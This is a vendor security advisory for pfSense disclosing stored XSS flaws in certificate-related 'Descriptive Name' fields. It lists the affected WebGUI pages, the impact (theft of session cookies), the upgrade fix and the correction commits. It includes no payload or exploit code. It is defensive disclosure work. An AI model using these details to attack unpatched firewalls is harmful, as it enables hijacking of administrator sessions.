-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-15_07.webgui Security Advisory pfSense Topic: Multiple Stored XSS Vulnerabilities in the pfSense WebGUI Category: pfSense Base System Module: webgui Announced: 2015-07-01 Credits: Hari Hara Subramani, Internal Affects: pfSense <= 2.2.3 Corrected: 2015-07-01 15:36:22 UTC (pfsense/master) 2015-07-01 15:32:50 UTC (pfsense/RELENG_2_2, pfSense 2.2.4) 0. Revision History v1.0 2015-07-01 Initial release I. Background The pfSense® system is a free network firewall distribution based on the FreeBSD operating system. The pfSense system includes third-party freesoftware packages for additional functionality, and provides most of the functionality of common commercial firewalls. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description Multiple Stored Cross-Site Scripting (XSS) vulnerabilities were found in the pfSense WebGUI. The "Descriptive Name" field of Certificate Authorities, Certificates, and Certificate Revocation Lists were not being sanitized or encoded properly in certain cases. As a result stored XSS was possible when values entered in these fields were displayed to the user. List of affected pages: usr/local/www/system_certmanager.php (Discovered by Hari Hara Subramani) usr/local/www/vpn_openvpn_server.php (Discovered by Hari Hara Subramani) usr/local/www/system_camanager.php (Discovered Internally) usr/local/www/system_crlmanager.php (Discovered Internally) usr/local/www/vpn_openvpn_client.php (Discovered Internally) usr/local/www/vpn_ipsec_phase1.php (Discovered Internally) usr/local/www/system_authservers.php (Discovered Internally) usr/local/www/system_usermanager.php (Discovered Internally) usr/local/www/system_advanced_admin.php (Discovered Internally) usr/local/www/services_captiveportal.php (Discovered Internally) usr/local/www/wizards/openvpn_wizard.inc (Discovered Internally) III. Impact Due to the lack of proper encoding on the affected variables and pages, arbitrary JavaScript can be executed in the user's browser. The user's session cookie or other information from the session may be compromised. IV. Workaround Upgrade to pfSense 2.2.4 or later which includes fixes for these issues. To mitigate the problem on older releases, use one or more of the following: * Limit access to the affected pages to trusted administrators only. V. Solution Upgrade to pfSense 2.2.4. This may be performed in the web interface or from the console. See https://doc.pfsense.org/index.php/Upgrade_Guide VI. Correction details The following list contains the correction revision numbers for each affected item. Branch/path Revision - - ------------------------------------------------------------------------- pfSense/master b75cdd94a7f6f571238dd313d5f499f05f819221 b741d2ef0047acf7b18b5748f1ec651eb7679909 234cde4b5dcdeb332d5376b9c2c6f5a79fba9c24 28bb81784f0ba3e147b1d78224b0a43d6675e714 8bcc385b3a5325a04a1afd72f439a40c7faff098 d6a94eda00a3df51f59ed893e6c0a7669d4ce563 a14571438d498c5b084cc5c94886f75cbdf58bfd 11df03205923c758039b697f89ec67cf4198f109 0d458903176fc2ba26969dfd4001402274dde62f e67c70a3b3035a73d3334b86afb4aac4433ccd4a 636dfa95287b088d17a53bf2e82de63ed54a625e pfSense/RELENG_2_2 362ddda19060ca54c18b43c3b758b00dd253937d 97fdd83dcb36383151bb40021ef66d907bc820c0 f08e24a389543908e4934e13af87221a803b0559 009bd5fea3306e7e3a2365130e5e8672dc312b67 f7ca96741d67a0719da213d410cf17e4437619f4 f9e80e5d657f6d67bb63411809564cb7f95eb8ff 2ce606e15a6affac120b185ae5430b959f4cae5f 76e3f194eb6d56728e4f031b61759990f6fd4538 d2d45b5fd47bfdb8a73cb44e32ea001e5d04aded 0d6b017b2808d42668e09757fab38bc7832ef0da ae142a104910ac810102abb69e24adf7b8811784 - - ------------------------------------------------------------------------- VII. References None. The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmElU9sACgkQE7mH/ZIU +Nonfw/+OG9VgVj2Iaktx+6eztit/Klh/VnisKZdN9I/eD5+UArA15aD0vAi0GK3 yrn7lreH4UcbNxuw3mQUZCYq9nIjBnD4DvD4UBrVx6LAYjnLj4tGuP/YBGzQSAeH MsKIGUc9WgL12BE+fsZsMu4UDQ+JVCTPQ06pvdqrhHooh+IcOuo/+Qhpf+W9NdTT Kr99jlJgLNoMGIcOrbYx/fzDm77OCyue0bYvYCh1PGxDWCs/qyWHpO342gguIEyx 56m4qOCfEgzc9SGwsRDVvUiaueOYJQerFYnFJmP+V8t3wMoL8QYU4TGT9CO+qyNP FwWiv3ztsnIO+mCaIliUQe/7CXZjs3ghr27Gh2QZxtTpf2tvyDDUmmRgNfNH8D7a HbdxvJdghXy/l34Ov9Gjf5Q+flMxsRVqsXWdLhZOkO2LUzvLzg1kctj+BKZC4Xbk s8h6KOMqdcJwoyLfShmS9U7l5qWkYBPe4plTw6dFdvCQdiTjhatoQJ02BTNuxLi8 ls3Jnntdbd4DJmkSJ3x0D4oHli7lQaWiAo5T5kyMTiEFMjp/zVIQ3fqVNM+Nbfzb rvSKOzHu6G+4Q5TUnmR+GgJT7wpqCCzPxGZC4c/ABU6A3Ew3LOU036gTSJUI3WAZ jtglV+Co5p2kHVRnh7AqM967X0Q5hvo1cV6yXwRCwhskF2EoQdA= =vfVt -----END PGP SIGNATURE-----